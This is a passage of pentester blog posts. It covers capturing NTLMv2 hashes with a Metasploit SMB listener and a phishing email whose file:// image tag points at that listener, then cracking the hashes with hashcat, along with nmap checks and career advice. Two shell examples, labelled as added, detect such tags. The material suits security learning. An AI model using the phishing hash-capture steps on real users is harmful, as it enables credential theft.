If it’s closed, this probably isn’t going to work. If there is no access to test that, we’re flying blind and just hoping here.
Set up a listener in Metasploit. I like auxiliary/server/capture/smb because it’s just so easy. Nothing to configure. Just “use” it and run.
Next, create an email for the target. In the email, include an HTML image tag and use file:// for the scheme. Point it to the Metasploit server, and reference some non-existent image. Example: <img src="file://192.168.1.10/image.jpg" /> This will create a broken image icon in the email, but when the user attempts to load it from a Windows machine, the user’s NTLMv2 hash will be sent to the listener.
If you want to also craft a believable phishing email, you could also put a link to a web page that you control and on that web page, also include the same image tag. This is just in case the user’s mail client doesn’t allow downloading of images. But a browser will!
Once hash(es) are captured, shut down the listener and, while still in Metasploit, enter: creds
This will give the hashes in a format that a password cracker like hashcat will understand. For hashcat, use -m5600 for the NTLMv2 format. Also, ensure there is no extra whitespace around the hashes when loaded into hashcat, or there will be a string length exception.
Run the cracker and pray. If it cracks, congrats! If not in the time allotted, sorry!
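From the defending side, the same tag is easy to spot in inbound mail or page HTML. The following is an added example, not part of the original post: a shell function that lists src/href values pointing at a remote file:// or UNC host. The function name and the sample HTML are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): list src/href values in HTML
# that point at a remote file:// or UNC host. Names and sample are constructed.

remote_file_refs() {
    # 1. pull out every src=/href= attribute, 2. drop the attribute name,
    # 3. drop ASCII quotes, 4. keep only values that name a remote host.
    grep -Eio '(src|href)[[:space:]]*=[[:space:]]*[^[:space:]>]+' |
    sed -E 's/^[^=]*=[[:space:]]*//' |
    tr -d "\"'" |
    while IFS= read -r url; do
        case "$url" in
            [Ff][Ii][Ll][Ee]:///*) ;;   # empty host part: a local path
            [Ff][Ii][Ll][Ee]://*|'\\'*) printf '%s\n' "$url" ;;
        esac
    done
}

# Constructed sample body; 192.168.1.10 is the address used in the text above.
sample_html='<p>Quarterly report attached.</p>
<img src="file://192.168.1.10/image.jpg" />
<img src="file:///C:/Users/me/logo.png">
<a href="https://intranet.example/report">report</a>
<img src="\\fileserver\share\logo.png">'

printf '%s\n' "$sample_html" | remote_file_refs
```

Only the two references that name a remote host are printed; the local file:/// path and the https link are ignored.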
Each week, I create a new directory for the test. It’s where I store notes, reports, artifacts, etc. I also create a screenshot directory and then set my system to auto-save screenshots to there. So I bash scripted it up. Here’s the script that will automatically create the new directory, the screenshot directory and tell my Mac system to save screenshots there:
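#!/bin/bash
# Create this week's job directory plus a screens/ subdirectory, then point
# macOS screenshot capture at it.
if [ -z "$1" ]
then
    echo "Usage: ./myscreens.sh [dirname]"
else
    # -p creates ~/Desktop/<dirname> and ~/Desktop/<dirname>/screens in one step
    mkdir -p ~/Desktop/"$1"/screens
    defaults write com.apple.screencapture location ~/Desktop/"$1"/screens
    # Restart SystemUIServer so the new screenshot location takes effect
    killall SystemUIServer
fi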
If you get guest network access, test for network segmentation. nmap the neighborhood looking for “up” hosts. If there are any, nmap them for services. Also check for nameservers.
If you get on the corporate network with credentials, it’s essentially now an internal assessment. Pick something to show risk and move on. After all, it’s a wireless assessment.
Test outside the building for access
Plug in a wifi repeater/AP, is it detected? Are there network access controls? (Probably not, and now you have internal access)
A couple posts down, I was parsing the nslookup command to get hostnames. Even easier, use the host command. The hostname seems to be the fifth string after spaces, so using cut, it might look something like:
host <ip> | cut -d " " -f5
But there will be a period at the end, so just clean that up. Next is to get the IP and the hostname in some easy format, like colon or pipe delimited.
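One way to finish the job described above, as an added example that is not from the original post: it strips the trailing period and emits pipe-delimited ip|hostname lines. It goes a little beyond the cut one-liner by keying on the PTR answer line, so lookup failures and multiple PTR records are handled. The function names and sample lines are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): turn `host <ip>` output into
# "ip|hostname" lines. Function names and sample lines are constructed.

# parse_host_output IP -- reads the text printed by `host IP` on stdin.
parse_host_output() {
    awk -v ip="$1" '
        # Only PTR answer lines carry a hostname. Error lines such as
        # "Host ... not found: 3(NXDOMAIN)" have "3(NXDOMAIN)" in field 5.
        /domain name pointer/ {
            name = $NF
            sub(/\.$/, "", name)        # drop the trailing period
            print ip "|" name
            found = 1
        }
        END { if (!found) print ip "|" }   # keep the IP, hostname left empty
    '
}

# resolve_list FILE -- one IP per line; needs the real `host` command and DNS.
resolve_list() {
    while IFS= read -r ip; do
        [ -n "$ip" ] || continue
        host "$ip" 2>/dev/null | parse_host_output "$ip"
    done < "$1"
}

# Constructed sample output (not captured from a real network).
sample_ok='10.1.168.192.in-addr.arpa domain name pointer fileserver.corp.example.'
sample_nx='Host 11.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)'

demo() {
    printf '%s\n' "$sample_ok" | parse_host_output 192.168.1.10
    printf '%s\n' "$sample_nx" | parse_host_output 192.168.1.11
}
demo
```

For a real run, put one IP per line in a file and call resolve_list on it.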
I got a job as a penetration tester, which I think is really exciting. It is a job that I get excited about. One that causes frustration and a feeling of accomplishment. I’ll officially start on April 11th. My plan is to track my progress here, and document things that I learn, in general.
I contacted some other friends who are pentesters and asked for their advice, ideas on things they wish they knew when they got started. I was given two great pieces of advice on things to read or study up on. One was to read the publications on GitHub from Cure53. Today I read their whitepaper on X-Frame-Options and various ways to still bypass the clickjacking protection it provides. I’m looking forward to reading the others, once I finish the other recommendation…The Tangled Web!
This in no way reflects my current management, it’s more thoughts of managers past and managers of other friends.
I’m surprised that more businesses and employers don’t always understand the true value of a good manager. I think often the thought is on how well the manager can do their own tasks, and they don’t see the true value of management and leadership. A management position is sometimes seen as just a logical career progression, and not thought of as a true skill, like many others. I have seen where a bad manager can be put in charge of a number of good employees, and the good employees end up either leaving the job or becoming stale, and then sometimes the manager also leaves the job. Then I think of the good employees who have left and would have still been an asset to the company if not for that bad manager.
A good manager can fix bad employees and make good ones better. A bad manager cannot fix bad employees and will likely make good ones bad, or make them leave.
How do you get started in infosec? It’s a question that gets asked a lot and there’s often a talk about it at every conference. Someone’s got advice on how they got started and how it could help someone else. Heck, I even did one myself at BSides Rhode Island (link).
I organize my local OWASP chapter in Rhode Island and I get speakers each month on the various web application security topics. In August 2012, I had a friend in the profession, Paul “pauldotcom” Asadoorian, come speak at the monthly meeting. During the normal course of conversation, I mentioned to Paul that I was trying to make a full conversion from an application developer to a web application security professional. I’d been to a couple SANS classes, I attend conferences when I can and I tinker on the side trying to learn. However, I was without a mentor or someone nearby to bounce ideas off of, ask questions of, or push me to learn new things. How do you learn when you don’t know *what* to learn?
I had also been tinkering with an idea with my employer to create a “staff sabbatical” where professional staff could go off and do some hands-on learning for a period of time. My suggestion was the equivalent of three months, full time. That could be spread out over a longer period or just go do it, cold-turkey and then return to the job. I told Paul that if I got my employer to agree to this kind of arrangement that I’d then be looking for a company to mentor with. Paul immediately perked right up, “How about with me!” I thought the idea was perfect. I brought the idea to my employer and they agreed, but it would only be for the equivalent of two months. I would work with Paul for 2-3 days a week and keep track of the days. I’d work for 30 days as an intern to Paul but then another 10 days, I would still work with Paul but I had to work on something related to web security for my employer. Done deal.
I started at the beginning of the new year, 2013.
On day one, Paul gave me my first two assignments. One was to “learn everything about CSRF (cross-site request forgery), build a demo and create a presentation for the PaulDotCom Security Weekly podcast.”
The second was to catalog every show he had ever done, into a wiki, specifically the technical segments and the guest interviews. At that point, he had done about 315 episodes. With not really knowing what CSRF was exactly and with that much grunt work ahead, I knew I’d be busy. But I’d learn a lot.
I alternated between the tasks as I thought the cataloging would be pretty mindless. Just going through the show notes, finding the guest interviewed, finding a copy of the video, if that was available and making a new entry in the wiki. In addition for each show that had a technical segment, I’d make an entry in the wiki for the person doing the segment, the topic and link to the video and slides, if those were available. As I started going through the interviews and especially the technical segments, I was amazed at how much was there. It seemed the show had talked to every well-respected expert in the field and it also seemed every topic had a technical segment on it done as well. Instead of simply cataloging all the segments, I started watching them. And learning! That wiki is an amazing treasure trove of information.
It didn’t take long to complete the catalog and dig deep into CSRF. First figuring out how it works, then setting up and playing with a vulnerable app (I chose a 5+ year old version of Drupal, 4.7.0) and then writing my own attack for it. I got to figure out how it worked from trial and error and got to do the happy dance when it did. I wrote it up and presented a “CSRF Primer” for the podcast.
When I was looking for my next task, I would watch Twitter for various tips and came across Adrian Crenshaw’s Irongeek web site. It contains videos from the many conferences, meetups and training sessions that he has attended. I watched a video by Jeremy Druin, on sqlmap and saw just how easy it is to use. From there, I started simply digging into the various switches/flags that can be used with it and decided to dig deep into one of those.
Rinse, lather, repeat.
My interest is mainly in application security. So I use the OWASP Top 10 as my checklist. Try to become proficient at one and then move on to the next. I also have a philosophy of learning that it helps to “learn, do, teach.” Each time I learn something new and think I have a solid understanding of it, I look for an opportunity to present it to someone else or a group. A local OWASP meeting group is great for this as meeting organizers are always looking for presenters.
What I’ve tried to do here is just explain one experience toward getting started in the field of infosec. Because in the end, it worked. I did make the full conversion from a programmer to being offered a job on a major technology company’s incident response team, focusing on web application attacks. It was everything I’d been working toward for years.
If you’re looking to get started in infosec or looking for advice to give others, some of the best that I got included to do it yourself, start a blog and focus. I hear people say they want to “do security stuff” but it’s not in their job description. I tell them to do it at home, at night, in their own labs. If it’s something you really want to do, you’ll find a way to make this happen. Then as you’re learning, document it all in a blog. This helps you to really think things through and may point out holes in your understanding, and serve as a place for you to go back months later when confronting a similar situation. Even better, when you’re looking for a job you can point them to your blog to show the work you’ve done. Lastly, people think they want to simply “work in security.” That’s great but it’s also like saying you want to be a doctor. When someone says they’re a doctor, usually the next question is what they specialize in. It’s the same thing with infosec. The field is way too big to know about everything. So specialize. Figure out what you like and what you want to be an expert on. Don’t get distracted by shiny objects in other areas outside of your interest.
That’s about it. If you want to get into the field, just do it, and even better if you can find a way to do an internship with a security company. Do everything they want you to do, even if it isn’t exactly what you’re interested in, as you never know where it could lead.